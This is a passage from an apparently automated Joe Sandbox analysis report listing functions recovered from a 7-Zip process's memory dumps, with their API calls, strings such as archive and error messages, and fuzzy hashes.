fputs.MSVCRT ref: 00B92281
fputs.MSVCRT ref: 00B922B7
free.MSVCRT ref: 00B922C3
fputs.MSVCRT ref: 00B922D9
fputs.MSVCRT ref: 00B92303

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputs$free
String ID:
API String ID: 3873070119-0
Opcode ID: 195860d1492bba094a57b9ecf7c7289ce8bcd6229381cd4e357f1d334659de32
Instruction ID: 12669ea591a27567b217e72fab7a989be72fd7577f2b7637a66827c27e0b09b0
Opcode Fuzzy Hash: 195860d1492bba094a57b9ecf7c7289ce8bcd6229381cd4e357f1d334659de32
Instruction Fuzzy Hash: 9E112B63314945A6DB20EB26E84036A7370F799BA5F404261EFAE83BA5DF2CC949C700

Function 00B56C84 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32 ref: 00B56CA8
GetLastError.KERNEL32 ref: 00B56CB6
CreateDirectoryW.KERNEL32 ref: 00B56CF1
free.MSVCRT ref: 00B56D01
free.MSVCRT ref: 00B56D0F

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: CreateDirectoryfree$ErrorLast
String ID:
API String ID: 3252411863-0
Opcode ID: fc7c84208e05cc916470f72eeea78ecee52ed3ec44cc2f5207f8f15f03265912
Instruction ID: dbe36ec36e86f6e33cf8b397f785d47fc9e167c89bfa2a11cc6f11fbee272f65
Opcode Fuzzy Hash: fc7c84208e05cc916470f72eeea78ecee52ed3ec44cc2f5207f8f15f03265912
Instruction Fuzzy Hash: 89018812304A0181D6209B21E98437D23B1DBCA7F2F9843F0DE6D937E5DF29C98E8600

Function 00B8056F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B80574
free.MSVCRT ref: 00B80598
free.MSVCRT ref: 00B805A1
free.MSVCRT ref: 00B805AA
free.MSVCRT ref: 00B805B5
free.MSVCRT ref: 00B82D73

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 4cc3be562f800f66c890074482ac147a4380dffb5d2304e0dd1a317519950c51
Instruction ID: 21e328073c7271d750c5f2dd92c1ea2d6fd690b57e54a4d095f78253cf10f8a5
Opcode Fuzzy Hash: 4cc3be562f800f66c890074482ac147a4380dffb5d2304e0dd1a317519950c51
Instruction Fuzzy Hash: D5F0B76335790442CA15FB26E5A166A5390A787F92F0114E29F0E67721DE38C48BCB04

Function 00B5EC90 Relevance: 7.5, APIs: 6, Instructions: 19COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B5EC9D
free.MSVCRT ref: 00B5ECA6
free.MSVCRT ref: 00B5ECAF
free.MSVCRT ref: 00B5ECB8
free.MSVCRT ref: 00B5ECC1
free.MSVCRT ref: 00B5ECCA

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 76439c2ae6d2279247935120ce8afe15d695928ca0b2e8dcd2c70b0a6abef4e1
Instruction ID: 0e2a86214ceb1b792968b57cb9d58908e200489a6834b84d0eb6e0fd6caaa067
Opcode Fuzzy Hash: 76439c2ae6d2279247935120ce8afe15d695928ca0b2e8dcd2c70b0a6abef4e1
Instruction Fuzzy Hash: CFE0F563713C0481CB14FF76DCA222E23A4EBD7F8971410D19F2EAB325CD20C85A8B84

Function 00B924B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 110COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B925EC
fputs.MSVCRT ref: 00B92636

Part of subcall function 00B9B1C8: memset.MSVCRT ref: 00B9B20D
Part of subcall function 00B9B1C8: fputs.MSVCRT ref: 00B9B232

Strings

Name, xrefs: 00B92612
Size, xrefs: 00B925A3

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputs$freememset
String ID: Name$Size
API String ID: 2276422817-481755742
Opcode ID: eadf18be6b312c5b5e1de07ee489d0b3ab3b1ff87b37fbe43ef131a6c7ee7c31
Instruction ID: 66d1b34f8bf55ddd1443e948893eae4e2087715bc494132fac5b83100df92f51
Opcode Fuzzy Hash: eadf18be6b312c5b5e1de07ee489d0b3ab3b1ff87b37fbe43ef131a6c7ee7c31
Instruction Fuzzy Hash: 9A41E372615780A2CF26EF34E4547DE37A0F754B99F8491A2AF5E42261DF78CA4AC340

Function 00B9BD5C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 82COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00B9BDCD
fputs.MSVCRT ref: 00B9BE0B

Part of subcall function 00B9B1C8: memset.MSVCRT ref: 00B9B20D
Part of subcall function 00B9B1C8: fputs.MSVCRT ref: 00B9B232

Strings

: Removing files after including to archive, xrefs: 00B9BDC6
Removing, xrefs: 00B9BDDB, 00B9BEA5

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputs$memset
String ID: : Removing files after including to archive$Removing
API String ID: 3543874852-1218467041
Opcode ID: f313436687fa66b8265a09a25303336257e01bcf81b9bc681d1f23b01fb39c8c
Instruction ID: f660446e2c9e6d08735f25ecaeacd61ccc077e450a2343950230401b73b38ec3
Opcode Fuzzy Hash: f313436687fa66b8265a09a25303336257e01bcf81b9bc681d1f23b01fb39c8c
Instruction Fuzzy Hash: B531A162205A8192DE69EB31E4817EE73A0E741B84F4884B29B9F46261DF7CD4CEC300

Function 00B9C47C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00B9C4FD
fputs.MSVCRT ref: 00B9C50D
free.MSVCRT ref: 00B9C553

Part of subcall function 00B9B1C8: memset.MSVCRT ref: 00B9B20D
Part of subcall function 00B9B1C8: fputs.MSVCRT ref: 00B9B232

Strings

: , xrefs: 00B9C506

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputs$freememset
String ID: :
API String ID: 2276422817-3653984579
Opcode ID: 2d51f8118dbba9063f6913f1af84da5abfe4bad0c8c255e5030384decc0f2edb
Instruction ID: 84fd74a0f361c43462e2782a69b9534834b6d692d816840911fd79c0d4d235ab
Opcode Fuzzy Hash: 2d51f8118dbba9063f6913f1af84da5abfe4bad0c8c255e5030384decc0f2edb
Instruction Fuzzy Hash: 7F118412341A4291DE28EB35D85137D63A0FB86BE5F0842B1EF2E57796EF38D8598344

Function 00B9B864 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00B9B8EB
free.MSVCRT ref: 00B9B90A

Part of subcall function 00B9B1C8: memset.MSVCRT ref: 00B9B20D
Part of subcall function 00B9B1C8: fputs.MSVCRT ref: 00B9B232

Strings

ERROR: , xrefs: 00B9B8DA
WARNING: , xrefs: 00B9B8D3

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputs$freememset
String ID: ERROR: $WARNING:
API String ID: 2276422817-2114518728
Opcode ID: 8e3bba8349f46928f641cc6bcc1daefcf3e0a2bdec40cb1967d92b4bec262380
Instruction ID: a94fce21d136dae12837cf68ca7534f24846ddaadccade5d994d47a41a682774
Opcode Fuzzy Hash: 8e3bba8349f46928f641cc6bcc1daefcf3e0a2bdec40cb1967d92b4bec262380
Instruction Fuzzy Hash: 23116312306A4145DA29EB22E9517BE7350E786BE5F4842F2EF6F57391DF2CC489C304

Function 00B910C4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00B910EB
fputs.MSVCRT ref: 00B91153
LeaveCriticalSection.KERNEL32 ref: 00B9118D

Strings

ERROR: , xrefs: 00B9114C

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: CriticalSection$EnterLeavefputs
String ID: ERROR:
API String ID: 4171338575-977468659
Opcode ID: be048cf6878443a2184a7b989802cb390b223653ec2da76719a795addb1c1f7a
Instruction ID: a2280a4196c254d3bb9f32da733389116734d8a46c05ebaf7c779c4bf5ae91b7
Opcode Fuzzy Hash: be048cf6878443a2184a7b989802cb390b223653ec2da76719a795addb1c1f7a
Instruction Fuzzy Hash: 7E11B23234194296DF05DF29EC407B833A1FB86BA5F4846B2DF2E5B2A4CF388449C314

Function 00B9BB9C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00B9BC6C
free.MSVCRT ref: 00B9BC78

Part of subcall function 00B9B1C8: memset.MSVCRT ref: 00B9B20D
Part of subcall function 00B9B1C8: fputs.MSVCRT ref: 00B9B232

Strings

Files read from disk, xrefs: 00B9BBEE
Archive size: , xrefs: 00B9BC29

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputs$freememset
String ID: Archive size: $Files read from disk
API String ID: 2276422817-3736835528
Opcode ID: 2efab2b554c4f96bbbe87714b73d16ad6655604f82f8fcc69e920b2b3405c337
Instruction ID: 15516f3c872cd05d023fe47e858d5720d53d0f72867f25d63d02fa60fb758f85
Opcode Fuzzy Hash: 2efab2b554c4f96bbbe87714b73d16ad6655604f82f8fcc69e920b2b3405c337
Instruction Fuzzy Hash: 8F11306330594190CF20EF24E89139D6770EBC57E9F8456B2EA5E876B9DF28C68EC700

Function 00B52974 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50COMMON

Download Yara Rule

Strings

a, xrefs: 00B529BA
z, xrefs: 00B529C0

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID:
String ID: a$z
API String ID: 0-4151050625
Opcode ID: 79b007a773469842fcff8db7cb0bfa3ab41b08846dae76e5ae68771568f84890
Instruction ID: 675ca8c228a8aac6d94d75a321d49ebdd5d4696b94460a6f7cc02436f968b182
Opcode Fuzzy Hash: 79b007a773469842fcff8db7cb0bfa3ab41b08846dae76e5ae68771568f84890
Instruction Fuzzy Hash: E6018C16F0709A85EB247B11A8943F8A2D2D717BA3F8D41F39F8907310E22949DEE312

Function 00B5AD0C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00B5AD1C
GetProcAddress.KERNEL32 ref: 00B5AD37

Strings

ntdll.dll, xrefs: 00B5AD15
RtlGetVersion, xrefs: 00B5AD2D

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: RtlGetVersion$ntdll.dll
API String ID: 1646373207-1489217083
Opcode ID: 4b5a8e6a765e93aad0567a887158774fb9c1889fb27dd6c52aa472cf121c010a
Instruction ID: aaf383a7aaa396cdb2b7bac4aa830279aee1fe087ffba525c5f3bc9de8cc32fa
Opcode Fuzzy Hash: 4b5a8e6a765e93aad0567a887158774fb9c1889fb27dd6c52aa472cf121c010a
Instruction Fuzzy Hash: 37F0A43131450597DB30EB20F4943B873F0EB48327F8406B5EB4A82690DB7CD94CCA01

Function 00B9BAAC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00B9BACF
fputs.MSVCRT ref: 00B9BAFC

Part of subcall function 00B52320: free.MSVCRT ref: 00B5237E
Part of subcall function 00B52320: fputs.MSVCRT ref: 00B523B8
Part of subcall function 00B52320: free.MSVCRT ref: 00B523C4

Strings

Open archive: , xrefs: 00B9BAC8
StdOut, xrefs: 00B9BAF2

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputs$free
String ID: Open archive: $StdOut
API String ID: 3873070119-2401103298
Opcode ID: ce59a64c16b32fbdc4fabaafe929a8674e998fc0354dffc2ed294dc1c66bfb13
Instruction ID: 6db61e26c03ca71f8faadbb21133a9648f57b2b14e467b3115dbe9f2016628cc
Opcode Fuzzy Hash: ce59a64c16b32fbdc4fabaafe929a8674e998fc0354dffc2ed294dc1c66bfb13
Instruction Fuzzy Hash: AEF05EA5305C8581CE059F2ADAC576D2361FB45FD5F48D472CE0E4B318DF28C489C300

Function 00B92344 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00B92375
fputs.MSVCRT ref: 00B92383

Part of subcall function 00B52300: fputc.MSVCRT ref: 00B52311

Strings

:, xrefs: 00B92359
, xrefs: 00B9235E

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputs$fputc
String ID: $:
API String ID: 1185151155-4041779174
Opcode ID: 158b50a13c805fd8231fb2a9988c9be95edbaf40012f3606b1facd01aece21a3
Instruction ID: ad546d72816c4a6a7d91c42e979acaf33cb46f11194cb7b3446d4885e5a75f39
Opcode Fuzzy Hash: 158b50a13c805fd8231fb2a9988c9be95edbaf40012f3606b1facd01aece21a3
Instruction Fuzzy Hash: 53E06D96308A8085CB169B26E85436D7361FB99FCDF488162EF8E0771ADF2CC148CB15

Function 00B9D4C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00B9D4CB
GetProcAddress.KERNEL32 ref: 00B9D4DB

Strings

GetLargePageMinimum, xrefs: 00B9D4D1
kernel32.dll, xrefs: 00B9D4C4

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetLargePageMinimum$kernel32.dll
API String ID: 1646373207-2515562745
Opcode ID: 9cafdcdec884bdbcba65c699ecbd7ef866ca1a9750535094873ebbbe4fc89029
Instruction ID: f27d318ce830a5ac068960a8d47376cb96a813b636bd597f138416d79b969a01
Opcode Fuzzy Hash: 9cafdcdec884bdbcba65c699ecbd7ef866ca1a9750535094873ebbbe4fc89029
Instruction Fuzzy Hash: B3E0B624756B0292EE09DB55FC9536837A0EBAAB54F94487A860E82360EF3CC659C354

Function 00B871BC Relevance: 6.5, APIs: 5, Instructions: 203COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B8734A
free.MSVCRT ref: 00B87355
GetLastError.KERNEL32 ref: 00B873AC
free.MSVCRT ref: 00B873B9
free.MSVCRT ref: 00B873C4

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$ErrorLast
String ID:
API String ID: 408039514-0
Opcode ID: d7c40869ad587d79d1a4cde6791f56a7827730960875fe2f1716f54cae6806b2
Instruction ID: bfeacc897ca9e1746dad99f9af91c737d4d8dec9145442fca25beb1aa99f7678
Opcode Fuzzy Hash: d7c40869ad587d79d1a4cde6791f56a7827730960875fe2f1716f54cae6806b2
Instruction Fuzzy Hash: D9816C32315A4082CB24EF25D48075EB7E1F789BA8F644295EF9E47B68EF38C855C740

Function 00B64210 Relevance: 6.4, APIs: 5, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 735d4e83ff881ba3abcc4a6c9aa5d61f64a5c4c51b6bddb4a0ec876fb6e64911
Instruction ID: 193fe4cfc1a2e59feea9296fe80ce80ff292f0c2f18883c6708251d629b5a834
Opcode Fuzzy Hash: 735d4e83ff881ba3abcc4a6c9aa5d61f64a5c4c51b6bddb4a0ec876fb6e64911
Instruction Fuzzy Hash: DA41E323316B8096CB20DF22D55026E67E0FB96BE4F4852E1EFAD17B59DF28C549CB00

Function 00B84C2C Relevance: 6.4, APIs: 5, Instructions: 114COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B84C6F
memmove.MSVCRT ref: 00B84D71
free.MSVCRT ref: 00B84D8E
free.MSVCRT ref: 00B84DA3
free.MSVCRT ref: 00B84DB1

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$memmove
String ID:
API String ID: 1534225298-0
Opcode ID: 2d6c9dfe1155a16f3a068d7370a8ec758800c3918b65cbcdfef43df97f9f1dc5
Instruction ID: 9d937eda5a81b6cf9b9b5d83fd5bde90ce5bcd2dc43214b792024324235a92f9
Opcode Fuzzy Hash: 2d6c9dfe1155a16f3a068d7370a8ec758800c3918b65cbcdfef43df97f9f1dc5
Instruction Fuzzy Hash: C241D7272096C085CB20EB25E48025FAFE1F3D6798F184195EF9607B69C7BEC499CB11

Function 00B8F4AC Relevance: 6.3, APIs: 5, Instructions: 91COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00B8F5BC
free.MSVCRT ref: 00B8F5D3
free.MSVCRT ref: 00B8F5DE

Part of subcall function 00B5383C: memmove.MSVCRT ref: 00B53877

free.MSVCRT ref: 00B8F5EF
free.MSVCRT ref: 00B8F5FA

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$ErrorLastmemmove
String ID:
API String ID: 3561842085-0
Opcode ID: 835e30b8a2ce9afd242e3c27a4bd6d2521a716217a04de116505d45ba31023b0
Instruction ID: 1eca1e5fde5d2fa59b62f56e863d7030cad6f0dc208ea53928b5ece5abb7a4d6
Opcode Fuzzy Hash: 835e30b8a2ce9afd242e3c27a4bd6d2521a716217a04de116505d45ba31023b0
Instruction Fuzzy Hash: D3317073215A4181CB20EF24E49036E73A0FB99BA5F5452A5FB9E477A8EF38C549CB00

Function 00B5EF70 Relevance: 6.3, APIs: 5, Instructions: 91COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B5EFBF
free.MSVCRT ref: 00B5EFC8
free.MSVCRT ref: 00B5EFD0
memmove.MSVCRT ref: 00B5F00D
free.MSVCRT ref: 00B5F015

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

